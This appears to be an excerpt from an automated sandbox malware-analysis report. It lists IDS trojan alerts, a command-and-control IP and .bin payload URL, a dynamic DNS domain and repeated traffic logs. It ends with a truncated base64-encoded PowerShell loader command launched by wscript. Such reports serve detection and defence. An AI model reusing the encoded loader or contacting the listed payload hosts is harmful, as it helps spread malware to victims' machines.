            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49808 -> 103.167.84.150:80
            Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.11.20:49810 -> 103.167.84.150:80
            Potential malicious VBS script found (has network functionality)Show sources
            Source: Initial file: BinaryStream.SaveToFile FileName, adSaveCreateOverWrite
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: septnet.duckdns.org
            Source: Joe Sandbox ViewASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox ViewASN Name: TELIANETTeliaCarrierEU TELIANETTeliaCarrierEU
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficTCP traffic: 192.168.11.20:49806 -> 193.104.197.85:6577
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: unknownTCP traffic detected without corresponding DNS query: 103.167.84.150
            Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpString found in binary or memory: http://103.167.84.150/bconta/Host_DwUbTLydN243.bin
            Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16196062237.0000000002EB9000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16335676506.0000000003298000.00000004.00000020.sdmp, ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin
            Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin)
            Source: ieinstal.exe, 00000014.00000002.16336303615.00000000032CA000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bin-
            Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binE
            Source: ieinstal.exe, 00000007.00000002.16980426643.0000000003159000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binO
            Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binU.s
            Source: ieinstal.exe, 00000013.00000002.16195282460.0000000002E88000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bina8;
            Source: ieinstal.exe, 00000013.00000002.16196308559.0000000002ED0000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bind
            Source: ieinstal.exe, 00000007.00000002.16981282399.0000000003320000.00000004.00000001.sdmp, ieinstal.exe, 00000013.00000002.16197752845.0000000003110000.00000004.00000001.sdmp, ieinstal.exe, 00000014.00000002.16339742625.0000000004CF0000.00000004.00000001.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.binhttp://103.167.84.150/bconta/Host_DwUbTLydN243.bin
            Source: ieinstal.exe, 00000014.00000002.16336884537.00000000032E8000.00000004.00000020.sdmpString found in binary or memory: http://103.167.84.150/mconta/Host_DwUbTLydN243.bins
            Source: powershell.exe, 0000000E.00000002.16332582350.0000000000C38000.00000004.00000001.sdmpString found in binary or memory: http://crl.micr
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000003.00000002.15261074930.0000000004E21000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.16412756099.0000000004D31000.00000004.00000001.sdmp, powershell.exe, 0000000D.00000002.16202623594.0000000004A81000.00000004.00000001.sdmp, powershell.exe, 0000000E.00000002.16345107555.0000000004C21000.00000004.00000001.sdmpString found in binary or memory: https://aka.ms/pscore6lBpm
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000003.00000002.15262680896.0000000004F79000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000003.00000002.15274992717.0000000005E8F000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: unknownDNS traffic detected: queries for: septnet.duckdns.org
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /mconta/Host_DwUbTLydN243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 103.167.84.150Cache-Control: no-cache

            System Summary:

            barindex
            Wscript starts Powershell (via cmd or directly)Show sources
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBTAGwAYQBnADkAIABVAE4ATgBPAEIATABFAFQATwBSACAAcwB1AHAAZQByAGUAbABlAG0AZQAgAGgAagBlAG0AbQBlAGgAagBsACAAdQBuAG4AaQBnACAAQwBPAE0AUABBAFIAQQBUACAASABPAFIAVABJAEsAVQBMAFQAIABEAFIAQQBJAE4ARQBSACAAVgBpAGsAdABvAHIAaQAxACAAVQBuAGwAYQA0ACAAUABvAHQAZQBuAHQAaQA1ACAAZQBzAHMAZQBuAGkAYQBuACAAcwBjAGEAcgBwAGgAaQBuAGcAIABCAEkATABFAFMAVABPACAADQAKAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABPAHAAaQBzAHQAaABvAGMAMwAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBu